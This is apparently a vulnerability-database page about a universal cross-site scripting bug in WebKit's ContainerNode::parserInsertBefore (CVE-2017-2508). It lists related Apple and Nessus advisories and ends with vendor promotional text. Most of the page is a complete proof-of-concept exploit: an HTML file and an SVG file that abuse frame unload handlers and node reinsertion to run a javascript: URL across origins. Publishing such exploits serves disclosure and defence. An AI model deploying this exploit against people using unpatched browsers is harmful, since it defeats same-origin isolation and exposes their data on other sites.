| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| WebKit - ContainerNode::parserInsertBefore Universal Cross-Site Scripting Exploit | 25 May 201700:00 | – | zdt | |
| Apple iOS < 10.3.2 Multiple Vulnerabilities | 17 May 201700:00 | – | nessus | |
| Safari < 10.1.1 Multiple Vulnerabilities | 18 May 201700:00 | – | nessus | |
| Apple iOS < 10.3.2 Multiple Vulnerabilities | 18 May 201700:00 | – | nessus | |
| GLSA-201706-15 : WebKitGTK+: Multiple vulnerabilities | 8 Jun 201700:00 | – | nessus | |
| macOS : Apple Safari < 10.1.1 Multiple Vulnerabilities | 23 May 201700:00 | – | nessus | |
| Linux Distros Unpatched Vulnerability : CVE-2017-2508 | 24 Aug 202500:00 | – | nessus | |
| About the security content of iOS 10.3.2 | 15 May 201700:00 | – | apple | |
| About the security content of Safari 10.1.1 | 15 May 201700:00 | – | apple | |
| About the security content of iOS 10.3.2 - Apple Support | 20 Jun 201710:37 | – | apple |
1.html
---------------------------
<body><iframe></iframe><table><b><p><iframe></iframe><script>
frames[1].onunload = function() {
document.body.removeChild(document.querySelector('table'));
}
onunload = function() {
// Clean up to fix some crashes during reload.
while (document.childNodes.length) {
document.removeChild(document.childNodes[0]);
}
}
onload = function() {
try{ frames[0].a }catch(e){ location.reload() };
xof = frames[0].frameElement;
xof.onload = function() {
xof.onload = null;
xof.src = 'javascript:alert(document.location)';
var xmlErr = document.documentElement.appendChild(document.createElement('iframe'));
xmlErr.src = '1.svg';
}
xof.src = 'data:text/html,crossOrigin';
}
</script></b></p></table></body>
---------------------------
1.svg
----------------------------
<svg xmlns="http://www.w3.org/2000/svg">
<script>
document.documentElement.appendChild(document.createElementNS('http://www.w3.org/1999/xhtml', 'iframe'));
var b = top.xof.parentNode;
if (t = b.childNodes[1]) {
// It appears that something is holding the table element alive
// because the node destructor didn't run and its siblings' refs
// to it weren't cleared, so it's still reachable during node
// traversals. That'd crash when insertedInto notifications try to
// use the node's parentOrShadowHostNode(), so make sure it has
// a parent, and use a spare document to avoid traversal loops.
top.frames[1].document.body.appendChild(t);
}
frames[0].onunload = function() {
document.documentElement.appendChild(b);
b.insertBefore(document.createElement('x'), top.xof);
}
</script>
<element a="1" a="2" />
</svg>
---------------------------
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation